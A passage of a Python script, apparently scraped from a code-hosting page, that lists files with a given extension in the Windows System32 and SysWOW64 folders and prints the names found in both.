p2 = os.path.join(os.environ['Windir'], 'SysWOW64' + os.sep + '*.' + ext)
|
||||||
|
|
||||||
|
sys.stderr.write('[.] System32: ' + p1 + '\n')
|
||||||
|
sys.stderr.write('[.] SysWOW64: ' + p2 + '\n')
|
||||||
|
|
||||||
|
for file in glob.glob(p1):
|
||||||
|
system32.add(os.path.basename(file))
|
||||||
|
|
||||||
|
for file in glob.glob(p2):
|
||||||
|
syswow64.add(os.path.basename(file))
|
||||||
|
|
||||||
|
commons = system32.intersection(syswow64)
|
||||||
|
sys.stderr.write(f"[.] Found {len(system32)} files in System32\n")
|
||||||
|
sys.stderr.write(f"[.] Found {len(syswow64)} files in SysWOW64\n")
|
||||||
|
sys.stderr.write(f"[.] Intersection of these two sets: {len(commons)}\n")
|
||||||
|
|
||||||
|
for f in commons:
|
||||||
|
print(f)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main(sys.argv)
|
Loading…
Reference in New Issue
Block a user